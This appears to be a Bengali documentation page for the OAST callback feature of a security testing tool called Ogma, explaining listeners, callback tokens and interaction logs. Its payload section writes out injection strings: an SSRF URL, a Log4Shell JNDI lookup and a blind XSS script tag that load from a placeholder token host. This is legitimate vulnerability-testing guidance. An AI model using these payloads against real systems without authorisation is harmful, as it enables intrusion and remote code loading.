OAST
OAST (Out-of-Band Application Security Testing) এমন দুর্বলতা শনাক্ত করে যার দৃশ্যমান উত্তর পাওয়া যায় না। পরিবর্তে লক্ষ্য আপনার নিয়ন্ত্রিত লিসেনারের সঙ্গে বহির্মুখী সংযোগ করে, যা সমস্যাটি নিশ্চিত করে।
যেভাবে কাজ করে
Ogma একাধিক প্রোটোকলে স্থানীয় লিসেনার চালায়। লক্ষ্য অ্যাপ্লিকেশন কোনো লিসেনারে যোগাযোগ করলে উৎস IP, টাইমস্ট্যাম্প, প্রাপ্ত তথ্য ও ইনজেক্ট করা টোকেনসহ যোগাযোগটি রেকর্ড করা হয়।
লিসেনারের প্রোটোকল
| প্রোটোকল | ডিফল্ট পোর্ট | ব্যবহারের ক্ষেত্র |
|---|---|---|
| HTTP | কনফিগারযোগ্য | SSRF, ব্লাইন্ড XSS, ওয়েবহুক |
| HTTPS | কনফিগারযোগ্য | TLS-এর মাধ্যমে SSRF |
| DNS | কনফিগারযোগ্য | ব্লাইন্ড ইনজেকশন, XXE, log4shell |
| SMTP | কনফিগারযোগ্য | ইমেইল হেডার ইনজেকশন, মেইল সেবায় SSRF |
OAST সেটিংস প্যানেলে লিসেনারের পোর্ট এবং তৈরি টোকেনে ব্যবহৃত ডোমেইন নাম নির্ধারণ করুন।
কলব্যাক টোকেন তৈরি
- সহায়ক সরঞ্জাম > OAST খুলুন।
- + নতুন খুলে তৈরি করুন চাপুন। প্রতিটি পরীক্ষার টোকেন অনন্য।
- টোকেন কপি করুন। এতে লিসেনারের ডোমেইন ও অনন্য শনাক্তকারী থাকে, যাতে যোগাযোগকে নির্দিষ্ট পরীক্ষার সঙ্গে মেলানো যায়।
টোকেনের বিন্যাসের উদাহরণ: [unique-id].[your-oast-domain]
পেলোডে টোকেন ব্যবহার
অ্যাপ্লিকেশন বহির্মুখী সংযোগ করতে পারে এমন যেকোনো ফিল্ডে কলব্যাক টোকেন ইনজেক্ট করুন:
- SSRF - লক্ষ্য URL হিসেবে HTTP/HTTPS টোকেন ব্যবহার করুন:
https://[token]/ - XXE - DOCTYPE বা বাহ্যিক এনটিটির URL-এ টোকেনের উল্লেখ করুন।
- Log4Shell - হেডারে যুক্ত করুন:
${jndi:ldap://[token]/a} - ব্লাইন্ড XSS - স্ক্রিপ্টের src হিসেবে ইনজেক্ট করুন:
<script src="https://[token]/x.js"></script> - SMTP ইনজেকশন - ইমেইল হেডারে গন্তব্য ঠিকানা বা URL হিসেবে ব্যবহার করুন।
যোগাযোগের লগ
যোগাযোগ প্যানেলে প্রাপ্ত প্রতিটি কলব্যাক দেখা যায়:
| কলাম | বর্ণনা |
|---|---|
| সময় | যোগাযোগ কখন এসেছে |
| প্রোটোকল | HTTP, HTTPS, DNS বা SMTP |
| উৎস IP | সংযোগকারী IP ঠিকানা |
| টোকেন | যে টোকেনে যোগাযোগ করা হয়েছে |
| তথ্য | অনুরোধের পাথ, DNS কোয়েরির নাম বা SMTP তথ্য |
যেকোনো সারিতে ক্লিক করলে যোগাযোগের সম্পূর্ণ বিবরণ দেখা যায়। প্রযোজ্য ক্ষেত্রে অনুরোধের হেডার ও বডিও অন্তর্ভুক্ত থাকে।
পরীক্ষার সঙ্গে যোগাযোগ মেলানো
প্রতিটি টোকেন অনন্য হওয়ায় বিভিন্ন প্যারামিটার বা অনুরোধে আলাদা টোকেন ইনজেক্ট করে ঠিক কোন ইনজেকশন পয়েন্ট কলব্যাক ঘটিয়েছে, তা নির্ধারণ করতে পারেন।
সম্পর্কিত পৃষ্ঠা
- স্ক্যানার
- পর্যবেক্ষণ (নিরাপত্তা পরীক্ষার ফলাফল)